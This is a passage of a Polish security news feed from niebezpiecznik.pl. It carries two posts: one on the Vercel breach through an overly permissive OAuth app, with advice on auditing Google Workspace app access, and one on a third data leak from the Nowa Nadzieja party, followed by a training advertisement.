<p>Jeśli nie chcesz, by jeden nieostrożny pracownik albo błędnie skonfigurowane środowisko pracy rozłożyło Twoją firmę na łopatki, to zapisz swój zespół na nasze <a href="https://niebezpiecznik.pl/web" target="_blank">szkolenie z bezpieczeństwa dla programistów</a> lub <a href="https://niebezpiecznik.pl/net" target="_blank">administratorów</a>! Pokazujemy na takim szkoleniu w praktyce, jakich błędów uniknąć, żeby nie znaleźć się na czołówkach gazet i nie musieć wysyłać zgłoszeń do RODO oraz listów z frazą &#8220;bezpieczeństwo jest dla nas najważniejsze, ale&#8230;&#8221; do Klientów ;)
</div>
<p>Żeby było weselej, grupa ShinyHunters stwierdziła na swoim kanale na Telegramie, że ktoś się pod nich podszywa (zapewne aby podnieść wiarygodność swojego ogłoszenia) a oni żadnych dostępów do Vercela nie sprzedają. </p>
<h3>Jak sprawdzić, czy nie macie takich pracowników u siebie w firmie?</h3>
<p>Jeśli korzystacie z Google Workspace, sprawdźcie czy też przypadkiem nie macie &#8220;zbyt szerokich dostępów&#8221; wpiętych po OAuth do swojej infrastruktury. W tym celu zaloguj się do panelu Google Admin Console i wejdź w sekcję Security. A potem Access and Data Control -> API Controls -> Manage app access -> <a href="https://admin.google.com/ac/owl/list?tab=apps" target="_blank">Accessed Apps</a>. Tu widać wszystkie aplikacje mające dostęp do Waszego środowiska. Warto sprawdzić, czy nie ma wśród nich dokładnie tej, która &#8220;zhackowała&#8221; Vercela. Aby to zrobić, wystarczy przefiltrować listę po ID aplikacji: </p>
<p><code>"110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent[.]com"</code></p>
<p>Jeśli zobaczysz tę aplikację na liście &#8212; oznacza to, że Twój firmowy Workspace może mieć nieproszonych gości. Należy niezwłocznie usunąć dostępy, rozpocząć procedurę analizy logów audytowych i zrotować adekwatne tokeny i hasła.</p>
<blockquote><p>Może warto też na przyszłość ograniczyć możliwość uwierzytelniania się po OAuth niektórym pracownikom/aplikacjom? Jest więcej niż pewne, że Wasi współpracownicy korzystają z kont służbowych do logowania się w usługach firm trzecich, zostawiając tam tokeny, które mogą dać komuś dostęp do Waszej infrastruktury&#8230; Nie mówiąc już o naruszeniach umów o poufność i wysyłaniu danych osobowych poza EOG. Jeśli zarządzasz IT w jakiejś firmie, warto to (i nie tylko to) ryzyko zaadresować jak najszybciej, a my możemy w tym pomóc. Jeśli nie wiesz od czego zacząć albo jak poprawnie ułożyć cyberbezpieczeństwo w firmie od zera, <a href="mailto:cso@niebezpiecznik.pl" target="_blank">daj nam znać &#8212; pomożemy</a>!</p></blockquote>
<p>A jeśli korzystasz z Vercela, to dobrym pomysłem będzie rotacja wszystkich sekretów, &#8220;sensitive variables&#8221; i rozważenie korzystania z zewnętrznych Secret Managerów na przyszłość. </p>
<h3>Vercel informuje klientów</h3>
<p>W sieci pojawiła się <a href="https://x.com/rauchg/status/2045995362499076169?s=12" target="_blank">wypowiedź</a> CEO Vercela z opisem ich ustaleń. Są też <a href="https://context.ai/security-update" target="_blank">gorzkie słowa</a> ze strony Contex.ai:</p>
<blockquote><p>Vercel is not a Context customer, but it appears that at least one employee enabled “allow all” on all requested Google Workspace permissions using their Vercel Google Workspace account. These permissions were intended to grant AI agents the ability to perform Google Workspace actions such as writing emails or creating documents on the grantee’s behalf.</p></blockquote>
<h3>Nie zwalajcie winy na AI (w tym przypadku)</h3>
<p>Opisywany incydent idealnie wpisuje się w to, co omawialiśmy niedawno w artykule pt. <a href="https://niebezpiecznik.pl/post/to-nie-ai-jest-najwiekszym-zagrozeniem-czyli-raport-opisujacy-incydenty-z-2025-roku/" target="_blank">To nie AI jest największym zagrożeniem</a>. Mimo że w nagłówkach portali królują dziś przerażające hasła o &#8220;śmiercionośnych skutkach korzystania z AI&#8221;, to tu wektorem ataku był błąd pracownika (dlatego <a href="https://niebezpiecznik.pl/bpi" target="_blank">warto ich edukować pod kątem dobrych praktyk cyberbezpieczeństwa</a>) &#8212; zaniedbanie, połączone z trywialnym złośliwym oprogramowaniem i brakiem egzekwowania reguły najmniejszych uprawnień (Least Privilege) oraz detekcji tego typu infekcji i braku kontrolowania &#8220;shadow IT / shadow AI&#8221;. </p>
<p>Narzędzia bazujące na sztucznej inteligencji, z których coraz częściej korzystają firmy działają &#8220;w chmurze&#8221; dokładnie tak, jak <em>nieejajowe</em> konta usługowe. I tak samo jak w przypadku wszystkich innych usług firm trzecich, bezwzględnie wymagają pełnej kontroli, audytu logów i zasady ograniczonego zaufania. Tu odsyłany do <a href="https://sklep.niebezpiecznik.pl/s/soc" target="_blank">naszego cyklu poświęconego budowie SOC</a>, który takie nadużycia pomaga wychwytywać.</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/zhackowali-ich-bo-pracownik-saas-z-ktorego-korzystali-pobral-cheaty-do-gier-czyli-dlaczego-trzeba-uwazac-na-oauth/#comments" rel="replies" thr:count="11" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/zhackowali-ich-bo-pracownik-saas-z-ktorego-korzystali-pobral-cheaty-do-gier-czyli-dlaczego-trzeba-uwazac-na-oauth/feed/atom/" rel="replies" thr:count="11" type="application/atom+xml"/>
			<thr:total>11</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[&#8220;Ssijcie ruskiego k&#8230;&#8221; czyli partia Mentzena zhackowana po raz 3]]></title>
		<link href="https://niebezpiecznik.pl/post/mentzen-zhackowany-nowa-nadzieja-wlamanie/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27007</id>
		<updated>2026-04-20T08:34:44Z</updated>
		<published>2026-04-20T08:16:54Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="Hacked!"/><category scheme="https://niebezpiecznik.pl" term="niepełnoletnie"/><category scheme="https://niebezpiecznik.pl" term="Nowa Nadzieja"/><category scheme="https://niebezpiecznik.pl" term="Sławomir Mentzen"/><category scheme="https://niebezpiecznik.pl" term="wyciek danych"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/mentzen-zhackowany-nowa-nadzieja-wlamanie/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Po raz trzeci dane członków oraz nieletnich sympatyków partii Mentzena zostały wykradzione i upublicznione w sieci. Tym razem włamywacz opublikował 500 rekordów zawierających: imię i nazwisko PESEL adres zamieszkania numery telefonów Wyciekły też dane osób oznaczonych jako &#8220;nieaktywne&#8221; ponieważ wciąż znajdowały się w bazie danych. Dodatkowo upubliczniona paczka zawiera treści SMS-ów, e-maili i dokumentów. To nie [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/mentzen-zhackowany-nowa-nadzieja-wlamanie/"><![CDATA[<p>Po raz trzeci dane członków oraz nieletnich sympatyków partii Mentzena zostały wykradzione i upublicznione w sieci. Tym razem włamywacz opublikował 500 rekordów zawierających:</p>
<ul>
<li>imię i nazwisko
<li>PESEL
<li>adres zamieszkania
<li>numery telefonów
</ul>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-600x228.jpg" alt="" width="600" height="228" class="aligncenter size-large wp-image-27009" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-600x228.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-350x133.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-768x292.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-1536x585.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-2048x780.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>Wyciekły też dane osób oznaczonych jako &#8220;<strong>nieaktywne</strong>&#8221; ponieważ wciąż znajdowały się w bazie danych. Dodatkowo upubliczniona paczka zawiera treści SMS-ów, e-maili i dokumentów. </p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2-600x542.jpg" alt="" width="600" height="542" class="aligncenter size-large wp-image-27008" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2-600x542.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2-277x250.jpg 277w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2-768x694.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2.jpg 1126w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>To nie pierwszy hack partii Mentzena</h3>
<p>Przypomnijmy, że pierwszy z ataków zakończony wyciekiem danych Nowej Nadziei miał miejsce <strong>16 marca 2025</strong>, <a href="https://niebezpiecznik.pl/post/wyciek-danych-nowa-nadzieja-slawomir-mentzen/" target="_blank">a drugi 4 sierpnia 2025</a>. Partia Mentzena do dziś nie odpowiedziała nam na pytania w sprawie ataków. Można też przypuszczać, że niewiele też poczyniono aby lepiej zabezpieczyć dostęp do danych. </p>
<p>Nie zdziwilibyśmy się, gdyby przyszło nam jeszcze w tym roku, po raz czwarty, opisywać kolejny incydent związany z tą partią&#8230;</p>
<p><a name='akt'></a><br />
<strong class='update'>Aktualizacja (20.04.2026 10:33)</strong><br />
Rzecznik prasowy Nowej Nadziei na Twitterze poinformował, że &#8220;sprawa dotyczy starego, nieaktualnego systemu, dotyczy sekcji młodzieżowej w jednym regionie w Polsce (Białystok)&#8221;.</p>
<h3>Jak uchronić się przed takimi atakami?</h3>
<p>Jeśli chcesz zabezpieczyć się przed atakami na swoje serwery i webaplikacje, zapraszamy na nasze bestsellerowe szkolenie, a raczej <a href="https://niebezpiecznik.pl/net" target="_blank">3 dniowe, pełne praktyki warsztaty, które nauczą Cię jak samodzielnie wykonywać testy penetracyjne</a>. Dzięki niemu wykryjesz dziury w swojej infrastrukturze zanim ktoś zrobi to za Ciebie i opublikuje w internecie dane Twoich klientów lub użytkowników &#8212; oto najbliższe terminy:</p>
<div class="info">
<div><p><b style="color:#f00">Wrocław</b>: <strong>17-19 czerwca 2026</strong>r. — zostało <strong>5 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 18 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20gog">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 15 maja)<br>
                        4444 PLN netto (od 16 maja)
                        </ul></div><div><p><b style="color:#f00">Warszawa</b>: <strong>01-03 lipca 2026</strong>r. — zostało <strong>7 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 12 maja 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20fty">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 15 maja)<br>
                        4444 PLN netto (od 16 maja)
                        </ul></div><div><p><b style="color:#f00"><span style="color:#FF00FF">ZDALNIE</span></b>: <strong>26-28 sierpnia 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 30 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20g0n">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 22 maja)<br>
                        4444 PLN netto (od 23 maja)
                        </ul></div>
</div>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/mentzen-zhackowany-nowa-nadzieja-wlamanie/#comments" rel="replies" thr:count="14" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/mentzen-zhackowany-nowa-nadzieja-wlamanie/feed/atom/" rel="replies" thr:count="14" type="application/atom+xml"/>
			<thr:total>14</thr:total>
			</entry>
	</feed>